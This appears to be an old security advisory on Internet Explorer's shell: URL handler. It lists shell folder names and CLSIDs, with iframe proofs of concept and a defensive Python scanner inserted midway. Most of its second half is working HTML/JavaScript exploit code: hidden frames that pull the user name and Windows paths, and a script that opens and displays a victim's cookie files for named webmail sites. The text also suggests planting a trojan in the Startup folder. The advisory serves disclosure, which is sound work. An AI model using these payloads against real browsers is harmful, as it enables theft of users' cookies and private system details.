This is a copy of the document I sent to securityfocus.com two days ago; hope you enjoy it.





Internet Explorer shell: URL handler


shell: URL handler security issues


1) shell: URL handler vulnerability:

There is a security issue in the way Internet Explorer handles URLs that
use the shell: URL handler. It can be used to extract information from a
victim's system by crafting HTML pages that carry a shell: URL as a src or
href value; the vulnerability gives such pages access to certain shell
folders, for instance:




shell:(shell folder name) ------> the URLs generally look like this.
You can find the shell folder names by searching the registry for
"shellfolder":
shell:windows
shell:cookies
shell:recent
shell:system
shell:Common AppData
shell:Common Desktop
shell:Common Documents
shell:Common Favorites
shell:Common Programs
shell:Common Start Menu
shell:Common Startup
shell:Common Templates
shell:Common Administrative Tools
shell:CommonVideo
shell:CommonPictures
shell:Personal
shell:local appdata
shell:profile
shell:Administrative Tools

.......


proof of concept:


---------------------------------------------------------------------------
<iframe id="Target" src='shell:windows' name="x" width="875" height="527">
</iframe>
---------------------------------------------------------------------------


This vulnerability alone is not that harmful, since only a limited set of
files can be executed (mainly those IE can normally open: *.bmp, *.txt,
*.log, *.jpeg, html, ...).

It is, however, possible to change folders, or to use these shell folders
to reach other folders on the user's system:

proof of concept:

---------------------------------------------------------------------------
<iframe id="Target" src='shell:windows\system32\config\' name="x"
width="875" height="527">
</iframe>
---------------------------------------------------------------------------

This gives exploits that can already write to the user's system the
ability to create files at exact locations on that system, for instance
saving a trojan horse in the Common Startup folder, which would ensure the
program starts whenever any of the users logs on.


2) CLSIDs and the shell: URL handler vulnerability:


The shell folders IE has access to can be reached not only by their shell
folder names but also by CLSIDs pointing to those folders:

shell:::(clsid)
The CLSIDs can be found under HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
[folders]

fonts shell:::{D20EA4E1-3957-11d2-A40B-0C5020524152}
tasks shell:::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
my computer shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
downloaded files shell:::{88C6C381-2E85-11D0-94DE-444553540000}
search shell:::{E17D4FC0-5564-11D1-83F2-00A0C90DC849}
{2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}
IE(homepage) shell:::{871C5380-42A0-1069-A2EA-08002B30309D}
recycle bin shell:::{645FF040-5081-101B-9F08-00AA002F954E}
network shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D}
control panel shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}
printers shell:::{2227A280-3AEA-1069-A2DE-08002B30309D}
web folders shell:::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
connection shell:::{992CFFA0-F557-101A-88EC-00DD010CCC48}
my documents shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}
administrative tools shell:::{D20EA4E1-3957-11d2-A40B-0C5020524153}
briefcase shell:::{85BBD920-42A0-1069-A2E4-08002B30309D}
scanners and cameras shell:::{E211B736-43FD-11D1-9EFB-0000F8757FCD}
cabinet shell:::{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}
startup shell:::{48e7caab-b918-4e58-a94d-505519c795dc}
common startup shell:::{0DF44EAA-FF21-4412-828E-260A8728E7F1}
programs folder shell:::{7be9d83c-a729-4d97-b5a7-1b7313c39e0a}
activex folder shell:::{88C6C381-2E85-11D0-94DE-444553540000}
.........

Note: shell: links combined with CLSIDs on a local machine can give users
the ability to bypass some restrictions:

Start > Run > shell:::{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} <press Enter>
------> the Folder Options dialog pops up



proof of concept:

---------------------------------------------------------------------------
<iframe id="Target" src='shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103}'
name="x" width="875" height="527">
</iframe>
---------------------------------------------------------------------------


Changing directories or folders is also possible with this vulnerability:


shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\a:
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\d:
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\e:

proof of concept:

---------------------------------------------------------------------------
<iframe id="Target" src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:'
name="x" width="875" height="527">
</iframe>
---------------------------------------------------------------------------


It is also possible to move between shell folders by chaining "\::{clsid}"
components:



proof of concept:

---------------------------------------------------------------------------
<iframe id="Target"
src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}'
name="x" width="875" height="527">
</iframe>
---------------------------------------------------------------------------

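A defender-side check for the URL shapes described in sections 1 and 2 (shell:name, shell:::{clsid}, chained \::{clsid} components and trailing paths), added here as an example that is not part of the original advisory: it scans HTML for URL attributes that would be resolved by the shell: handler and reports what each one points at. The sample page, the attribute list and the result fields are constructed for this example.

```python
import re
from html.parser import HTMLParser

# CLSID syntax as used by the shell:::{clsid} form above.
CLSID = r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}"
URL_ATTRS = {"src", "href", "data", "action", "background"}  # constructed list

def parse_shell_url(value):
    """kind: 'folder' (shell:name), 'clsid' (shell:::{...}, chainable with \\::{...})
    or 'bare_clsid' ({...} used directly as src); path: trailing file-system part."""
    v = value.strip()
    if re.fullmatch(CLSID, v):
        return {"kind": "bare_clsid", "folder": None, "clsids": [v.upper()], "path": "", "raw": v}
    if not v.lower().startswith("shell:"):
        return None
    parts = [p for p in re.split(r"[\\/]+", v[len("shell:"):]) if p]
    folder, clsids, path = None, [], []
    for i, part in enumerate(parts):
        m = re.fullmatch("::(" + CLSID + ")", part)
        if m:
            clsids.append(m.group(1).upper())  # ::{clsid} component, chaining allowed
        elif i == 0:
            folder = part  # named shell folder: windows, profile, Common Startup, ...
        else:
            path.append(part)  # traversal below the folder, e.g. system32\config or c:
    return {"kind": "clsid" if clsids else "folder", "folder": folder,
            "clsids": clsids, "path": "\\".join(path), "raw": v}

class ShellUrlScanner(HTMLParser):
    """Collects URL-bearing attributes whose value goes through the shell: handler."""
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        for name, val in attrs:
            hit = parse_shell_url(val) if name in URL_ATTRS and val else None
            if hit:
                hit["tag"] = tag
                self.findings.append(hit)

def scan_html(markup):
    scanner = ShellUrlScanner()
    scanner.feed(markup)
    return scanner.findings

# Constructed sample page using the URL shapes shown in the advisory.
SAMPLE = r"""<iframe src='shell:windows\system32\config\' width="0" height="0"></iframe>
<a href="shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\c:">drive</a>
<iframe src='shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}'>
<iframe src='{E773F1AF-3A65-4866-857D-846FC9C4598A}'></iframe>
<img src="https://example.test/logo.png">"""
```

Running scan_html(SAMPLE) yields four findings (the https image is ignored); a proxy or mail filter can reject or log a page on any hit.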

If Internet Explorer is forced to open the "Shell Storage Folder Viewer"
using this method, Internet Explorer crashes, which closes all open
windows:


proof of concept:


---------------------------------------------------------------------------
<iframe id="Target" src='{E773F1AF-3A65-4866-857D-846FC9C4598A}'
name="x" width="875" height="527">
</iframe>
---------------------------------------------------------------------------


Programs like "NetMeeting" can somehow be run using this method:



proof of concept:

---------------------------------------------------------------------------

click

---------------------------------------------------------------------------
*It is also possible to start MSN Messenger, but whether other programs
can be run has not been tested.





3) \shdoclc.dll\ vulnerability:

When a known file on the user's system is accessed using shell:(shell
folder name) or shell:::(clsid), Internet Explorer does not open the file
according to its file type but reacts as if it had been asked to download
that file from the location. This is the case as long as IE itself cannot
open that file (*.gif, *.bmp, *.txt, ... for instance *.txt is opened
using Notepad). When this happens, the page that tried to open the file
causes an error that res://C:\WINHOLEZ\System32\shdoclc.dll\ responds to;
the URL of the page generated by shdoclc.dll contains the location of
that file, which can reveal important information.


proof of concept:

IE 6
IE 6+sp1

---------------------------------------------------------------------------
<html>
<head>
</head>
<body onload="setTimeout('exploit()',4*100);">
<!-- hidden frame; IE cannot render ntuser.ini and lands on the shdoclc.dll
     error page, whose URL carries the resolved local path of the file -->
<iframe id="Target" width="0" height="0"
src="shell:profile\ntuser.ini" name="Target" scrolling="yes">
</iframe>
<SCRIPT language=JavaScript>
// Line breaks inside the written strings were lost in transit; they are
// rendered here as <br> (an assumption about the original markup).
function exploit(){
var loc=new String(Target.location);   // Target is the frame window (IE exposes named frames as globals)
var len=loc.length;
var n=loc.indexOf("Settings")+9;       // skip "Settings\" to reach the user name
var m=loc.indexOf("System32");
var preuser=new String(loc.substring(n,len));
var p=preuser.indexOf("\\");
var user=new String(preuser.substring(0,p));
var winloc=new String(loc.substring(6,m));          // Windows folder, after the 6-character scheme prefix
var q=winloc.indexOf("\\");
var rootdrive=new String(winloc.substring(0,q+1));  // e.g. C:\
var targetwin=window.open("");
targetwin.document.write("Username : "+user+"<br>");
targetwin.document.write("root drive : "+rootdrive+"<br>");
targetwin.document.write("location of windows folder : "+winloc+"<br>");
targetwin.document.write("location of user profile : "+rootdrive+"Documents and Settings\\"+user+"\\");
targetwin.document.write("<br><br>Wallpaper :<br><br><img border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30% height=30%>");
targetwin.document.write("<br><br>internet explorer wallpaper :<br><br><br><img border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Application Data\\Microsoft\\Internet Explorer\\Internet Explorer Wallpaper.bmp' width=30% height=30%><br><br>");
}
</SCRIPT>
</body>
</html>
---------------------------------------------------------------------------




proof of concept:

(reading cookies)

IE 6 only
*On IE6+SP1 the exploit won't work because the cookies folder cannot be
accessed; this is because the Cookies folder is treated as part of the
Restricted Sites zone, whose security level is High, so the script won't
be effective.


---------------------------------------------------------------------------
<html>
<head>
</head>
<body onload="setTimeout('exploit()',4*100);">
<!-- hidden frame; IE cannot render ntuser.ini and lands on the shdoclc.dll
     error page, whose URL carries the resolved local path of the file -->
<iframe id="Target" width="0" height="0"
src="shell:profile\ntuser.ini" name="Target" scrolling="yes">
</iframe>
<SCRIPT language=JavaScript>
// Line breaks inside the written strings were lost in transit; they are
// rendered here as <br> (an assumption about the original markup).
var user;   // user name recovered from the error-page URL, shared with x()
function exploit(){
var loc=new String(Target.location);   // Target is the frame window (IE exposes named frames as globals)
var len=loc.length;
var n=loc.indexOf("Settings")+9;       // skip "Settings\" to reach the user name
var m=loc.indexOf("System32");
var preuser=new String(loc.substring(n,len));
var p=preuser.indexOf("\\");
user=new String(preuser.substring(0,p));
var winloc=new String(loc.substring(6,m));          // Windows folder, after the 6-character scheme prefix
var q=winloc.indexOf("\\");
var rootdrive=new String(winloc.substring(0,q+1));  // e.g. C:\
var targetwin=window.open("");
targetwin.document.write("Username : "+user+"<br>");
targetwin.document.write("root drive : "+rootdrive+"<br>");
targetwin.document.write("location of windows folder : "+winloc+"<br>");
targetwin.document.write("location of user profile : "+rootdrive+"Documents and Settings\\"+user+"\\");
targetwin.document.write("<br><br>Wallpaper :<br><br><img border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp' width=30% height=30%>");
targetwin.document.write("<br><br>internet explorer wallpaper :<br><br><br><img border=0 src='"+rootdrive+"Documents and Settings\\"+user+"\\Application Data\\Microsoft\\Internet Explorer\\Internet Explorer Wallpaper.bmp' width=30% height=30%><br><br>");

var k=0;
var Targeturln=new Array("yahoo","hotmail","antionline");   // sites whose cookie files are looked up
do{
var Targeturl=Targeturln[k];
var contentx=x(Targeturl);
if(contentx!=""){
targetwin.document.write("<br><br><font size=5>Contents of the cookie file(s) related to "+Targeturl+"</font><br><br><br><br><font>"+contentx+"</font><br><br>");
}
if(contentx==""){
targetwin.document.write("<br><br><font size=5>No files found related to "+Targeturl+"</font><br><br><br>");
}
k++;
}while(k<3);
return false;
}

// Cookie files are named user@site[n].txt; both the bare and the www. site names are tried.
function x(url){
var content="";
var i=0;
do{
var cookie=window.open("shell:profile\\Local Settings\\Temp\\cookies\\"+user+"@"+url+"["+i+"].txt");
if (cookie.document.body.innerText!="")
content=content+"<br>"+user+"@"+url+"["+i+"].txt :<br><br>"+cookie.document.body.innerText;
cookie.close();
i++;
}while(i<=3);
i=0;
do{
// "@www." matches the file name reported in the output (the original omitted the dot)
var cookie=window.open("shell:profile\\Local Settings\\Temp\\cookies\\"+user+"@www."+url+"["+i+"].txt");
if (cookie.document.body.innerText!="")
content=content+"<br>"+user+"@www."+url+"["+i+"].txt :<br><br>"+cookie.document.body.innerText;
cookie.close();
i++;
}while(i<=3);
return content;
}
</SCRIPT>
</body>
</html>
---------------------------------------------------------------------------


author: Roozbeh Afrasiabi

roozbeh_afrasiabi@yahoo.com
da_stone_cold_killer@yahoo.com

all rights reserved

Any changes to this document must be made with the permission of the
author; you may store or use this information as long as it has not been
changed.



